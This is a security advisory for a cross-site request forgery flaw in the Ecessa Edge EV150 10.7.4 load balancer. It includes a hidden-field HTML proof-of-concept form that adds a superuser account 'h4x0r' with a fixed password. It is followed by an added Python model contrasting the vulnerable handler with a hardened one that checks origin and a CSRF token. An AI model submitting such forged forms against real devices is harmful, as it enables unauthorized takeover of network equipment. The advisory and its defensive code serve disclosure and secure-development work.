Ecessa Edge EV150 10.7.4 Add Superuser Cross Site Request Forgery

Ecessa Edge EV150 version 10.7.4 suffers from an add superuser cross site request forgery vulnerability.

MD5 | 32235352c43c1764ff3761997d4f28eb


Ecessa Edge EV150 10.7.4 CSRF Add Superuser Exploit

Vendor: Ecessa Corporation
Product web page:
Affected version: 10.7.4

Summary: Internet Failover and Load Balancing for Small Businesses, Stores
and Branch Offices.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: lighttpd/1.4.35

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2018-5474
Advisory URL:



<form action="" method="POST">
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="user_username1" value="root" />
<input type="hidden" name="user_enabled1" value="on" />
<input type="hidden" name="user_passwd1" value="" />
<input type="hidden" name="user_passwd_verify1" value="" />
<input type="hidden" name="user_delete1" value="" />
<input type="hidden" name="user_username2" value="admin" />
<input type="hidden" name="user_passwd2" value="" />
<input type="hidden" name="user_passwd_verify2" value="" />
<input type="hidden" name="user_delete2" value="" />
<input type="hidden" name="user_username3" value="user" />
<input type="hidden" name="user_enabled3" value="on" />
<input type="hidden" name="user_passwd3" value="" />
<input type="hidden" name="user_passwd_verify3" value="" />
<input type="hidden" name="user_delete3" value="" />
<input type="hidden" name="user_username4" value="h4x0r" />
<input type="hidden" name="user_enabled4" value="on" />
<input type="hidden" name="user_superuser4" value="on" />
<input type="hidden" name="user_passwd4" value="123123" />
<input type="hidden" name="user_passwd_verify4" value="123123" />
<input type="hidden" name="users_num" value="4" />
<input type="hidden" name="page" value="util_configlogin" />
<input type="hidden" name="val_requested_page" value="user_accounts" />
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="page_uuid" value="3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d" />
<input type="hidden" name="form_has_changed" value="1" />
<input type="submit" value="Supersize!" />
</form>
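The description above says the interface applies configuration POSTs without any check that the request came from its own UI, and the PoC form shows the field layout that reaches the user-accounts page. The following is an added example, not Ecessa's code: a small Python model of such a handler, first with only the session gate the advisory describes, then with the two checks that stop a cross-site form post (a same-origin check on the Origin/Referer header and a per-session synchronizer token). The field names come from the PoC form; EXPECTED_ORIGIN, the parsing logic and the handler structure are assumptions made for illustration.

```python
# Added example (not Ecessa's code): model of a "user accounts" save handler,
# as the advisory describes it and then hardened. Field names mirror the PoC
# form; EXPECTED_ORIGIN and the handler logic are assumptions.
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Origin a browser sends when the real admin UI posts the form (constructed placeholder).
EXPECTED_ORIGIN = "https://edge.example.invalid"

# Constructed copy of the PoC form fields, as a browser would submit them.
FORGED_FORM = {
    "savecrtcfg": "checked",
    "user_username1": "root", "user_enabled1": "on",
    "user_passwd1": "", "user_passwd_verify1": "", "user_delete1": "",
    "user_username2": "admin",
    "user_passwd2": "", "user_passwd_verify2": "", "user_delete2": "",
    "user_username3": "user", "user_enabled3": "on",
    "user_passwd3": "", "user_passwd_verify3": "", "user_delete3": "",
    "user_username4": "h4x0r", "user_enabled4": "on", "user_superuser4": "on",
    "user_passwd4": "123123", "user_passwd_verify4": "123123",
    "users_num": "4",
    "page": "util_configlogin", "val_requested_page": "user_accounts",
    "form_has_changed": "1",
}


@dataclass
class Session:
    """Authenticated admin session; the anti-CSRF token lives here, not in the form."""
    username: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    form: dict
    headers: dict = field(default_factory=dict)


class RequestRejected(Exception):
    """Raised instead of applying a configuration change."""


def parse_user_rows(form):
    """Turn user_<field><n> columns (n = 1..users_num) into account records."""
    rows = []
    for i in range(1, int(form.get("users_num", "0")) + 1):
        name = form.get(f"user_username{i}")
        if not name:
            continue
        password = form.get(f"user_passwd{i}", "")
        if password != form.get(f"user_passwd_verify{i}", ""):
            raise RequestRejected(f"password fields differ in row {i}")
        rows.append({
            "username": name,
            "enabled": form.get(f"user_enabled{i}") == "on",
            "superuser": form.get(f"user_superuser{i}") == "on",
            "password": password,
        })
    return rows


def save_users_unchecked(session, request):
    """Behaviour the advisory describes: a valid session is the only gate, so a
    POST auto-submitted by another site is applied like any other."""
    if session is None or request.method != "POST":
        raise RequestRejected("authenticated POST required")
    return parse_user_rows(request.form)


def _same_origin(url):
    # Compare scheme and host exactly; a prefix match would accept look-alike hosts.
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" == EXPECTED_ORIGIN


def save_users_checked(session, request):
    """Hardened handler: the POST must come from the device's own origin and carry
    the synchronizer token that only the genuine UI page can embed."""
    if session is None or request.method != "POST":
        raise RequestRejected("authenticated POST required")
    origin = request.headers.get("Origin") or request.headers.get("Referer", "")
    if not _same_origin(origin):
        raise RequestRejected(f"request did not originate from {EXPECTED_ORIGIN}")
    token = request.form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        raise RequestRejected("missing or invalid csrf_token")
    return parse_user_rows(request.form)


def superusers_added(rows):
    """Names of enabled superuser accounts in a parsed submission."""
    return [r["username"] for r in rows if r["enabled"] and r["superuser"]]


if __name__ == "__main__":
    session = Session("root")
    forged = Request("POST", FORGED_FORM, {"Origin": "https://evil.invalid"})
    print("unchecked handler applied:", superusers_added(save_users_unchecked(session, forged)))
    try:
        save_users_checked(session, forged)
    except RequestRejected as why:
        print("checked handler refused:", why)
```

A request with no Origin and no Referer is also refused here; that is deliberate, since a state-changing admin POST from the real UI always carries one of them, and failing closed is the safer default for a device configuration page. The token check uses a constant-time comparison so the token cannot be recovered one byte at a time through response timing.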

